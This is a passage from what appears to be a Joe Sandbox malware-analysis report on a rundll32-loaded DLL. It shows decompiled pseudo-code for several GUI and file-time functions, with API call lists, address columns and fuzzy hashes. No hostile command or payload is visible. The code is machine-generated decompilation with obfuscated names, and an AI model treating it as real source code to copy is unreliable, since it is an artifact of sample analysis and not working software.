								}
								goto L32;
							}
							E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t160);
							__eflags = _t160;
							if(__eflags == 0) {
								L46:
								_t166 = 0;
								goto L25;
							}
							_t161 = _t160 -  *((intOrPtr*)(_t169 - 0x24));
							__eflags = _t161;
							_push(0);
							_push(_t161 + _t131);
							_push(_t161);
							L38:
							E10004030( *((intOrPtr*)(_t169 - 0x14)));
							_t166 = 1;
							goto L25;
						}
					} else {
						_t166 = 0;
						__eflags =  *((intOrPtr*)(_t169 - 0x10));
						if( *((intOrPtr*)(_t169 - 0x10)) >= 0) {
							L24:
							E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t158);
							L25:
							 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
							E10004B10(_t169 + 0xb, _t155, __eflags);
							_t100 = _t166;
							goto L3;
						}
						__eflags = _t96 - _t131;
						if(_t96 < _t131) {
							goto L24;
						}
						__eflags =  *0x100991a0 - _t166; // 0x0
						_t164 = _t96;
						if(__eflags == 0) {
							_t164 = _t164 - _t131;
							goto L18;
						}
						__eflags = _t131;
						 *((intOrPtr*)(_t169 + 0xc)) = _t131;
						if(_t131 == 0) {
							goto L18;
						} else {
							goto L16;
						}
						do {
							L16:
							 *((intOrPtr*)(_t169 + 0xc)) =  *((intOrPtr*)(_t169 + 0xc)) - 1;
							_t121 = E1003F60C(_t158, _t158 + _t164);
							__eflags =  *((intOrPtr*)(_t169 + 0xc));
							_t164 = _t121 - _t158;
						} while ( *((intOrPtr*)(_t169 + 0xc)) != 0);
						_t96 =  *((intOrPtr*)(_t169 - 0x1c));
						goto L18;
					}
				} else {
					_t100 = 0;
					L3:
					return E1003EF21(_t100);
				}
			}




























                                                                                                        0x1001ff7f
                                                                                                        0x1001ff86
                                                                                                        0x1001ff8b
                                                                                                        0x1001ff8d
                                                                                                        0x1001ff95
                                                                                                        0x1001ffa8
                                                                                                        0x1001ffae
                                                                                                        0x1001ffbd
                                                                                                        0x1001ffc1
                                                                                                        0x1001ffc4
                                                                                                        0x1001ffdc
                                                                                                        0x1001ffe3
                                                                                                        0x1001ffe6
                                                                                                        0x1001ffeb
                                                                                                        0x1001ffef
                                                                                                        0x1001fff1
                                                                                                        0x1001fff4
                                                                                                        0x1002000b
                                                                                                        0x1002000e
                                                                                                        0x10020018
                                                                                                        0x1002001d
                                                                                                        0x1002001f
                                                                                                        0x10020026
                                                                                                        0x1002002b
                                                                                                        0x1002002e
                                                                                                        0x10020030
                                                                                                        0x10020030
                                                                                                        0x10020030
                                                                                                        0x10020031
                                                                                                        0x10020031
                                                                                                        0x10020031
                                                                                                        0x1002001f
                                                                                                        0x1001fff6
                                                                                                        0x10020004
                                                                                                        0x10020004
                                                                                                        0x1002003d
                                                                                                        0x1002003f
                                                                                                        0x10020042
                                                                                                        0x10020046
                                                                                                        0x10020048
                                                                                                        0x10020082
                                                                                                        0x10020082
                                                                                                        0x1002008a
                                                                                                        0x1002008c
                                                                                                        0x1002008f
                                                                                                        0x10020091
                                                                                                        0x10020091
                                                                                                        0x10020097
                                                                                                        0x1002009d
                                                                                                        0x100200a0
                                                                                                        0x1002015c
                                                                                                        0x1002015f
                                                                                                        0x1002016d
                                                                                                        0x1002016d
                                                                                                        0x1002016f
                                                                                                        0x1002016f
                                                                                                        0x10020173
                                                                                                        0x10020161
                                                                                                        0x10020165
                                                                                                        0x10020166
                                                                                                        0x10020166
                                                                                                        0x10020176
                                                                                                        0x10020178
                                                                                                        0x100201a3
                                                                                                        0x100201a6
                                                                                                        0x00000000
                                                                                                        0x1002017a
                                                                                                        0x1002017a
                                                                                                        0x1002017d
                                                                                                        0x10020183
                                                                                                        0x10020186
                                                                                                        0x10020189
                                                                                                        0x1002018c
                                                                                                        0x1002018e
                                                                                                        0x10020191
                                                                                                        0x10020193
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10020195
                                                                                                        0x10020198
                                                                                                        0x1002019b
                                                                                                        0x1002019f
                                                                                                        0x100201a1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100201a1
                                                                                                        0x100201b5
                                                                                                        0x100201ba
                                                                                                        0x100201bd
                                                                                                        0x100201c2
                                                                                                        0x100201c3
                                                                                                        0x00000000
                                                                                                        0x100201c3
                                                                                                        0x100200a6
                                                                                                        0x100200a6
                                                                                                        0x100200a9
                                                                                                        0x100200d5
                                                                                                        0x100200d8
                                                                                                        0x100200ab
                                                                                                        0x100200ad
                                                                                                        0x100200b1
                                                                                                        0x100200b1
                                                                                                        0x100200da
                                                                                                        0x10020131
                                                                                                        0x10020131
                                                                                                        0x10020134
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100200de
                                                                                                        0x100200e2
                                                                                                        0x10020106
                                                                                                        0x1002010d
                                                                                                        0x10020110
                                                                                                        0x10020114
                                                                                                        0x10020117
                                                                                                        0x1002011c
                                                                                                        0x1002011f
                                                                                                        0x10020128
                                                                                                        0x1002012f
                                                                                                        0x00000000
                                                                                                        0x1002012f
                                                                                                        0x10020121
                                                                                                        0x10020124
                                                                                                        0x10020126
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10020126
                                                                                                        0x100200e4
                                                                                                        0x100200e9
                                                                                                        0x100200eb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100200f1
                                                                                                        0x100200f6
                                                                                                        0x100200f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100200fe
                                                                                                        0x10020101
                                                                                                        0x10020104
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10020104
                                                                                                        0x10020139
                                                                                                        0x1002013e
                                                                                                        0x10020140
                                                                                                        0x100201ab
                                                                                                        0x100201ab
                                                                                                        0x00000000
                                                                                                        0x100201ab
                                                                                                        0x10020142
                                                                                                        0x10020142
                                                                                                        0x10020145
                                                                                                        0x1002014a
                                                                                                        0x1002014b
                                                                                                        0x1002014c
                                                                                                        0x1002014f
                                                                                                        0x10020156
                                                                                                        0x00000000
                                                                                                        0x10020156
                                                                                                        0x1002004a
                                                                                                        0x1002004a
                                                                                                        0x1002004c
                                                                                                        0x1002004f
                                                                                                        0x100200ba
                                                                                                        0x100200bd
                                                                                                        0x100200c2
                                                                                                        0x100200c2
                                                                                                        0x100200c9
                                                                                                        0x100200ce
                                                                                                        0x00000000
                                                                                                        0x100200ce
                                                                                                        0x10020051
                                                                                                        0x10020053
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10020055
                                                                                                        0x1002005b
                                                                                                        0x1002005d
                                                                                                        0x100200b6
                                                                                                        0x00000000
                                                                                                        0x100200b6
                                                                                                        0x1002005f
                                                                                                        0x10020061
                                                                                                        0x10020064
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10020066
                                                                                                        0x10020066
                                                                                                        0x10020066
                                                                                                        0x1002006e
                                                                                                        0x10020075
                                                                                                        0x1002007b
                                                                                                        0x1002007b
                                                                                                        0x1002007f
                                                                                                        0x00000000
                                                                                                        0x1002007f
                                                                                                        0x1001ffca
                                                                                                        0x1001ffca
                                                                                                        0x1001ffcc
                                                                                                        0x1001ffd1
                                                                                                        0x1001ffd1

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1001FF86
                                                                                                          • Part of subcall function 1001F715: lstrlenA.KERNEL32(00000000,00000000,?,1001F871,00000000,?,?), ref: 1001F71F
                                                                                                        • SendMessageA.USER32 ref: 1001FFA8
                                                                                                        • lstrlenA.KERNEL32(?), ref: 10020037
                                                                                                        • __mbsinc.LIBCMT ref: 10020129
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$H_prolog3MessageSend__mbsinc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2830579515-0
                                                                                                        • Opcode ID: f120add9e4bfb679a08832c9905ddc0a3f4aa6d1f32e1d00d752fd8e7474c45f
                                                                                                        • Instruction ID: 5f729e9cf38f3c6fa6a9ef37f2f8371849d17b170ab57e52258a0f193bfd8316
                                                                                                        • Opcode Fuzzy Hash: f120add9e4bfb679a08832c9905ddc0a3f4aa6d1f32e1d00d752fd8e7474c45f
                                                                                                        • Instruction Fuzzy Hash: 9B819E3590425A9FDB11CFA4D880AEEBBB6FF48340F91452AF855AB252D731AE41CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10005A50, Relevance: 6.2, APIs: 4, Instructions: 175COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E10005A50(intOrPtr __ecx, void* __eflags) {
				void* _v8;
				char _v16;
				char _v20;
				signed int _v24;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _v44;
				signed int _v52;
				char _v184;
				char _v344;
				char _v360;
				void _v392;
				struct tagLOGFONTA _v424;
				char _v428;
				intOrPtr _v484;
				char _v588;
				char _v600;
				char _v616;
				char _v620;
				intOrPtr _v624;
				char _v632;
				char _v648;
				struct HWND__* _v652;
				char _v653;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				signed int _t57;
				void* _t62;
				void* _t66;
				void* _t69;
				void* _t77;
				intOrPtr _t84;
				void* _t91;
				void* _t99;
				intOrPtr _t101;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr _t148;
				void* _t149;
				void* _t151;
				signed int _t152;
				signed int _t154;

				_push(0xffffffff);
				_push(0x10056f87);
				_push( *[fs:0x0]);
				_t154 = (_t152 & 0xfffffff8) - 0x268;
				_t55 =  *0x10072650; // 0xb5e27fef
				_v24 = _t55 ^ _t154;
				_push(_t99);
				_push(_t139);
				_t57 =  *0x10072650; // 0xb5e27fef
				_push(_t57 ^ _t154);
				 *[fs:0x0] =  &_v16;
				_t146 = __ecx;
				_v624 = __ecx;
				E10007B48( *((intOrPtr*)(E1000AB19(_t99, _t139, __ecx, __eflags) + 4)));
				_t100 = 0;
				_v8 = 0;
				_t62 = E1001F659(_t146);
				_t147 = 0;
				_t157 = _t62;
				if(_t62 != 0) {
					_t138 =  *(_t62 + 4);
					GetObjectA( *(_t62 + 4), 0x3c,  &_v392);
					_t147 =  &(_v424.lfItalic);
				}
				_push(_t100);
				_push(0x14000c);
				_push(_t100);
				E100252DF(_t100,  &_v588, _t139, _t147, _t157);
				_v20 = 1;
				_t66 = E10023654( *((intOrPtr*)(E1000AB19(_t100, _t139, _t147, _t157) + 4)), _t138, _t139, _v484);
				_t158 = _t66;
				if(_t66 != 0) {
					E10007B72( *((intOrPtr*)(E1000AB19(_t100, _t139, _t147, __eflags) + 4)));
					_t69 = E100253F2( &_v600);
					_t139 = _t69;
					__eflags = _t69 - _t100;
					if(__eflags != 0) {
						E1000899B( &_v632);
						_v20 = 2;
						E10008F85( &_v632, _t139, _t151, GetDC(_t100));
						E1000899B( &_v620);
						_v24 = 3;
						E10008F85( &_v620, _t139, _t151, _t139);
						__eflags = _t147 - _t100;
						if(__eflags != 0) {
							_t138 =  &_v616;
							_push( &_v616);
							_t100 =  &_v632;
							E100059F0( &_v632, _t147);
							_t154 = _t154 + 4;
						}
						_push(0);
						_push( &_v616);
						_push(2);
						_push(_t147);
						E10025E53(_t100,  &_v344, _t139, _t147, __eflags);
						_v36 = 4;
						_t77 = E1002600E(_t100,  &_v360, __eflags);
						__eflags = _t77 - 1;
						if(_t77 == 1) {
							_t149 =  &_v184;
							memcpy( &(_v424.lfWidth), _t149, 0xf << 2);
							_t139 = _t149 + 0x1e;
							_push( &_v648);
							E100059F0( &_v632,  &(_v424.lfWidth));
							_t100 = _v652;
							_t154 = _t154 + 0x10;
							E1001F641(_t100, 0);
							_t36 = _t100 + 0x94; // 0x94
							_t147 = _t36;
							E10009289(_t36);
							_t138 =  &_v424;
							_t91 = E10009236(_t36, _t149 + 0x1e, _t151, CreateFontIndirectA( &_v424));
							__eflags = _t91;
							if(_t91 != 0) {
								E1001F641(_t100, _t147);
								_t147 =  &_v428;
								memcpy(0x10099d88, _t147, 0xf << 2);
								_t154 = _t154 + 0xc;
								_t139 = _t147 + 0x1e;
								E100180D5( *((intOrPtr*)(_t100 + 0x54)), 0, 0, 0, 1);
							}
						}
						ReleaseDC(0, E10008FB8(_t100,  &_v648));
						_v36 = 3;
						E100099E7( &_v360, _t139, _t147, __eflags);
						_v36 = 2;
						E10008FE9( &_v632);
						_v36 = 1;
						E10008FE9( &_v648);
						_v36 = 0;
					} else {
						_push(0xffffffff);
						_push(_t100);
						_push(0xfa0);
						E100251E9(_t100, _t138, _t139, _t147, __eflags);
						_v32 = _t100;
					}
				} else {
					_push(0xffffffff);
					_push(_t100);
					_push(0xfa1);
					E100251E9(_t100, _t138, _t139, _t147, _t158);
					_v32 = _t100;
				}
				E100099E7( &_v616, _t139, _t147, _t158);
				_v36 = 0xffffffff;
				_t84 = E10004B10( &_v653, _t138, _t158);
				 *[fs:0x0] = _v44;
				_pop(_t140);
				_pop(_t148);
				_pop(_t101);
				return E10039F21(_t84, _t101, _v52 ^ _t154, _t138, _t140, _t148);
			}
















































                                                                                                        0x10005a56
                                                                                                        0x10005a58
                                                                                                        0x10005a63
                                                                                                        0x10005a64
                                                                                                        0x10005a6a
                                                                                                        0x10005a71
                                                                                                        0x10005a78
                                                                                                        0x10005a7a
                                                                                                        0x10005a7b
                                                                                                        0x10005a82
                                                                                                        0x10005a8a
                                                                                                        0x10005a90
                                                                                                        0x10005a92
                                                                                                        0x10005a9e
                                                                                                        0x10005aa3
                                                                                                        0x10005aa7
                                                                                                        0x10005aae
                                                                                                        0x10005ab3
                                                                                                        0x10005ab5
                                                                                                        0x10005ab7
                                                                                                        0x10005ab9
                                                                                                        0x10005ac7
                                                                                                        0x10005acd
                                                                                                        0x10005acd
                                                                                                        0x10005ad4
                                                                                                        0x10005ad5
                                                                                                        0x10005ada
                                                                                                        0x10005adf
                                                                                                        0x10005ae4
                                                                                                        0x10005afe
                                                                                                        0x10005b03
                                                                                                        0x10005b05
                                                                                                        0x10005b28
                                                                                                        0x10005b31
                                                                                                        0x10005b36
                                                                                                        0x10005b38
                                                                                                        0x10005b3a
                                                                                                        0x10005b59
                                                                                                        0x10005b5f
                                                                                                        0x10005b72
                                                                                                        0x10005b7b
                                                                                                        0x10005b85
                                                                                                        0x10005b8d
                                                                                                        0x10005b92
                                                                                                        0x10005b94
                                                                                                        0x10005b96
                                                                                                        0x10005b9a
                                                                                                        0x10005b9b
                                                                                                        0x10005b9f
                                                                                                        0x10005ba4
                                                                                                        0x10005ba4
                                                                                                        0x10005ba7
                                                                                                        0x10005bad
                                                                                                        0x10005bae
                                                                                                        0x10005bb0
                                                                                                        0x10005bb8
                                                                                                        0x10005bc4
                                                                                                        0x10005bcc
                                                                                                        0x10005bd1
                                                                                                        0x10005bd4
                                                                                                        0x10005bdf
                                                                                                        0x10005bed
                                                                                                        0x10005bed
                                                                                                        0x10005bf3
                                                                                                        0x10005bff
                                                                                                        0x10005c04
                                                                                                        0x10005c08
                                                                                                        0x10005c0f
                                                                                                        0x10005c14
                                                                                                        0x10005c14
                                                                                                        0x10005c1c
                                                                                                        0x10005c21
                                                                                                        0x10005c32
                                                                                                        0x10005c37
                                                                                                        0x10005c39
                                                                                                        0x10005c3e
                                                                                                        0x10005c4c
                                                                                                        0x10005c5a
                                                                                                        0x10005c5a
                                                                                                        0x10005c5a
                                                                                                        0x10005c61
                                                                                                        0x10005c61
                                                                                                        0x10005c39
                                                                                                        0x10005c72
                                                                                                        0x10005c7f
                                                                                                        0x10005c87
                                                                                                        0x10005c90
                                                                                                        0x10005c98
                                                                                                        0x10005ca1
                                                                                                        0x10005ca9
                                                                                                        0x10005cae
                                                                                                        0x10005b3c
                                                                                                        0x10005b3c
                                                                                                        0x10005b3e
                                                                                                        0x10005b3f
                                                                                                        0x10005b44
                                                                                                        0x10005b49
                                                                                                        0x10005b49
                                                                                                        0x10005b07
                                                                                                        0x10005b07
                                                                                                        0x10005b09
                                                                                                        0x10005b0a
                                                                                                        0x10005b0f
                                                                                                        0x10005b14
                                                                                                        0x10005b14
                                                                                                        0x10005cba
                                                                                                        0x10005cc3
                                                                                                        0x10005cce
                                                                                                        0x10005cda
                                                                                                        0x10005ce2
                                                                                                        0x10005ce3
                                                                                                        0x10005ce4
                                                                                                        0x10005cf6

                                                                                                        APIs
                                                                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 10005AC7
                                                                                                        • GetDC.USER32(00000000), ref: 10005B67
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 10005C29
                                                                                                        • ReleaseDC.USER32 ref: 10005C72
                                                                                                          • Part of subcall function 100251E9: __EH_prolog3.LIBCMT ref: 100251F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFontH_prolog3IndirectObjectRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1902108384-0
                                                                                                        • Opcode ID: 009b31c7c4a9cd924300e1cfc923fb572e4a1d395f1ef1e7ee369b1d2f5db2b9
                                                                                                        • Instruction ID: 43a5c0de32a61335ee8c2fb6996d5d5fb86942e4cd88d06886c3ae927c1fda2b
                                                                                                        • Opcode Fuzzy Hash: 009b31c7c4a9cd924300e1cfc923fb572e4a1d395f1ef1e7ee369b1d2f5db2b9
                                                                                                        • Instruction Fuzzy Hash: 7D61B1792083819FE760DB64C896BAFB7D8EF94340F404A2CF58957196DF70AA08C752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10025B20, Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10025B20(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t102 = _a4;
				_t100 = __ecx;
				E1003E9B0(__ecx, _t102, 0, 0x128);
				E100083B8(0, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x1005dc58; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E100256CA( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E100257E4(0,  &_v36, _t101,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E100256CA( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E100257E4(0,  &_v36, _t101,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E100256CA( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E100257E4(0,  &_v36, _t101,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}






















                                                                                                        0x10025b28
                                                                                                        0x10025b35
                                                                                                        0x10025b37
                                                                                                        0x10025b4a
                                                                                                        0x10025b4f
                                                                                                        0x10025b55
                                                                                                        0x10025b5b
                                                                                                        0x10025c6f
                                                                                                        0x00000000
                                                                                                        0x10025c71
                                                                                                        0x10025b69
                                                                                                        0x10025b76
                                                                                                        0x10025b83
                                                                                                        0x10025b8c
                                                                                                        0x10025b8f
                                                                                                        0x10025b92
                                                                                                        0x10025b98
                                                                                                        0x10025b9e
                                                                                                        0x10025bb6
                                                                                                        0x10025ba0
                                                                                                        0x10025ba0
                                                                                                        0x10025ba0
                                                                                                        0x10025bc4
                                                                                                        0x10025be0
                                                                                                        0x10025be2
                                                                                                        0x10025bc6
                                                                                                        0x10025bcf
                                                                                                        0x10025bd6
                                                                                                        0x10025bdb
                                                                                                        0x10025bdb
                                                                                                        0x10025bf0
                                                                                                        0x10025c11
                                                                                                        0x10025c14
                                                                                                        0x10025bf2
                                                                                                        0x10025bfb
                                                                                                        0x10025c02
                                                                                                        0x10025c08
                                                                                                        0x10025c08
                                                                                                        0x10025c22
                                                                                                        0x10025c43
                                                                                                        0x10025c46
                                                                                                        0x10025c24
                                                                                                        0x10025c2d
                                                                                                        0x10025c34
                                                                                                        0x10025c3a
                                                                                                        0x10025c3a
                                                                                                        0x10025c4e
                                                                                                        0x10025c53
                                                                                                        0x10025c58
                                                                                                        0x10025c58
                                                                                                        0x10025c61
                                                                                                        0x10025c66
                                                                                                        0x10025c6c
                                                                                                        0x10025c6c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10025b92
                                                                                                        0x10025b78
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 10025B37
                                                                                                          • Part of subcall function 100083B8: _wctomb_s.LIBCMT ref: 100083C8
                                                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 10025B6E
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 10025B83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$SizeTime_memset_wctomb_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 26245289-0
                                                                                                        • Opcode ID: 37e7b4bd8c4ae8b79e6b281baa40832121101acb0dd08918080e8c874512c5ed
                                                                                                        • Instruction ID: 6b0a94699e3062f1e5e59892f32082bdeff9aaa7680875fd1b7cbdc39e0dfbf3
                                                                                                        • Opcode Fuzzy Hash: 37e7b4bd8c4ae8b79e6b281baa40832121101acb0dd08918080e8c874512c5ed
                                                                                                        • Instruction Fuzzy Hash: FA412A755047059FCB24CF68D88589AB7F8FF083517908A2EE5A7D3690E731F944CB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10024866, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E10024866(void* __ecx, void* __edx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t66;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t93;
				signed short _t96;
				void* _t105;
				signed int _t108;
				int* _t109;
				void* _t113;

				_t105 = __edx;
				_t113 = __ecx;
				_push(0);
				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
					_t58 =  *((intOrPtr*)(__ecx + 0xb0));
					_t108 = _a4 * 0x28;
					 *(__ecx + 0x118) = 1;
					 *((intOrPtr*)(_t58 + 0x20)) =  *((intOrPtr*)(_t58 + _t108 + 0x20));
					 *((intOrPtr*)(_t58 + 0x24)) =  *((intOrPtr*)(_t58 + _t108 + 0x24));
					_t59 =  *((intOrPtr*)(__ecx + 0xb0));
					 *((intOrPtr*)(_t59 + 0x10)) =  *((intOrPtr*)(_t59 + _t108 + 0x10));
					 *((intOrPtr*)(_t59 + 0x14)) =  *((intOrPtr*)(_t59 + _t108 + 0x14));
					_push( *((intOrPtr*)(__ecx + 0x114)) + _a4);
					E10023D9F(__ecx);
					E10023AD4(__ecx, _t105, __eflags, 0);
					_t109 = _t108 +  *((intOrPtr*)(_t113 + 0xb0)) + 0x18;
					_a8 = MulDiv(_a8,  *_t109, _t109[1]);
					_t66 = MulDiv(_a12,  *_t109, _t109[1]);
					_t93 =  *((intOrPtr*)(_t113 + 0xb0));
					_a8 = _a8 +  *_t93;
					__eflags = _t66 +  *((intOrPtr*)(_t93 + 4));
					return E10032A2C(_t113,  *_t93, _a8, _t66 +  *((intOrPtr*)(_t93 + 4)));
				}
				 *(__ecx + 0x118) =  *(__ecx + 0x108);
				ShowScrollBar( *(__ecx + 0x20), 0, ??);
				_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x134)))) + 0x74));
				_t96 =  *(_t73 + 0x1e) & 0x0000ffff;
				if(_t96 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t113 + 0x20), 1, _a4);
					if(_a4 != 0) {
						_t76 =  *((intOrPtr*)(_t113 + 0x134));
						_v28 = 3;
						_v24 =  *( *((intOrPtr*)( *_t76 + 0x74)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t76 + 0x74)) + 0x1e) & 0x0000ffff;
						_v16 = 1;
						if(E1000C6FC(_t113, 1,  &_v32, 0) == 0) {
							E1000D381(_t113, 1, _v24, _v20, 0);
						}
					}
					return E10023D9F(_t113,  *((intOrPtr*)(_t113 + 0x114)), 1);
				}
				_a4 = 1;
				if((_t96 & 0x0000ffff) - ( *(_t73 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}



















                                                                                                        0x10024866
                                                                                                        0x10024870
                                                                                                        0x10024879
                                                                                                        0x1002487a
                                                                                                        0x1002493a
                                                                                                        0x10024940
                                                                                                        0x10024943
                                                                                                        0x10024951
                                                                                                        0x10024958
                                                                                                        0x1002495b
                                                                                                        0x10024965
                                                                                                        0x1002496c
                                                                                                        0x1002497a
                                                                                                        0x1002497b
                                                                                                        0x10024983
                                                                                                        0x10024994
                                                                                                        0x100249a5
                                                                                                        0x100249ad
                                                                                                        0x100249af
                                                                                                        0x100249ba
                                                                                                        0x100249bd
                                                                                                        0x00000000
                                                                                                        0x100249c5
                                                                                                        0x10024890
                                                                                                        0x10024896
                                                                                                        0x100248a0
                                                                                                        0x100248a3
                                                                                                        0x100248ac
                                                                                                        0x100248c6
                                                                                                        0x100248c6
                                                                                                        0x100248c9
                                                                                                        0x100248d1
                                                                                                        0x100248d6
                                                                                                        0x100248d8
                                                                                                        0x100248de
                                                                                                        0x100248ee
                                                                                                        0x100248fa
                                                                                                        0x10024908
                                                                                                        0x10024912
                                                                                                        0x1002491e
                                                                                                        0x1002491e
                                                                                                        0x10024912
                                                                                                        0x00000000
                                                                                                        0x1002492d
                                                                                                        0x100248bd
                                                                                                        0x100248c4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

